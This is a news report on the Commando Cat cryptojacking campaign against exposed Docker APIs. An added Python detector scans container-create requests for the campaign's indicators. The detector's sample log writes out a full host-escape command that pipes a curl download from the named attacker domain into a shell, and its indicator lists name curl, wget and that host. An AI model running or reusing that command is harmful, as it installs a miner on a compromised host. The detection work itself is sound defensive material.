A threat actor known as Commando Cat is linked to an ongoing cryptojacking campaign that exploits poorly secured Docker instances to deploy cryptocurrency miners for financial gain.
Trend Micro researchers Sunil Bharti and Shubham Singh stated in an analysis on Thursday: “Attackers use the cmd.cat/chattr Docker image container to retrieve payloads from their own command and control (C&C) infrastructure.”
Commando Cat is named for its use of the open-source Commando project to generate benign containers and was first documented by Cado Security earlier this year.
These attacks target misconfigured Docker remote API servers: the attacker deploys the cmd.cat/chattr Docker image, instantiates containers from it, and uses the chroot command to escape the container's confinement and gain access to the host operating system.
The final step involves using curl or wget commands to retrieve malicious mining program binaries from C&C servers (“leetdbs.anondns[.]net/z”) via shell scripts. The binary is suspected to be ZiggyStarTux, an open-source IRC bot based on Kaiten (also known as Tsunami) malware.
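As an added defensive example, not code from the Trend Micro or Cado Security reports: a small Python detector that scans Docker Engine API container-create requests for the indicators described above (the cmd.cat/chattr image, a chroot in the container command, and a curl/wget fetch from the named C&C host). The log records are constructed for this example, and the host-root bind-mount check is an assumption, since the article does not say how the container reaches the host filesystem.

```python
"""Added example, not from the Trend Micro / Cado reports: flag Docker Engine API
container-create requests that match the Commando Cat chain. Records are
constructed JSON-per-line; a real deployment would feed API audit output."""
import json

# Indicators taken from the article. The bind-mount check is an assumption:
# a chroot into the host needs the host root filesystem mounted in the container.
KNOWN_IMAGES = {"cmd.cat/chattr"}
KNOWN_C2 = {"leetdbs.anondns.net"}
FETCH_TOOLS = ("curl", "wget")


def suspicious_indicators(create_req: dict) -> list[str]:
    """Return the reasons a container-create request looks like the campaign."""
    reasons = []
    image = create_req.get("Image", "")
    if image in KNOWN_IMAGES:
        reasons.append(f"known campaign image {image}")
    for bind in create_req.get("HostConfig", {}).get("Binds", []):
        if bind.split(":", 1)[0] == "/":  # host root mounted into the container
            reasons.append(f"host root filesystem bind-mounted ({bind})")
    cmd = " ".join(create_req.get("Cmd") or [])
    if any(tool in cmd for tool in FETCH_TOOLS) and any(c2 in cmd for c2 in KNOWN_C2):
        reasons.append("fetches payload from known C&C host")
    if "chroot" in cmd:
        reasons.append("chroot in container command")
    return reasons


def scan(log_lines: list[str]) -> list[tuple[str, list[str]]]:
    """Scan JSON-per-line create requests; return (container name, reasons) for hits."""
    hits = []
    for line in log_lines:
        req = json.loads(line)
        reasons = suspicious_indicators(req)
        if reasons:
            hits.append((req.get("Name", "<unnamed>"), reasons))
    return hits


# Constructed sample: one benign request and one matching the article's chain.
SAMPLE_LOG = [
    json.dumps({"Name": "web", "Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"],
                "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}}),
    json.dumps({"Name": "chattr", "Image": "cmd.cat/chattr",
                "Cmd": ["sh", "-c", "chroot /host sh -c 'curl -s leetdbs.anondns.net/z | sh'"],
                "HostConfig": {"Binds": ["/:/host"]}}),
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_LOG):
        print(name, "->", "; ".join(reasons))
```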
Researchers stated, “The significance of this campaign lies in its use of Docker images to deploy cryptojacking scripts on infected systems. This strategy allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software.”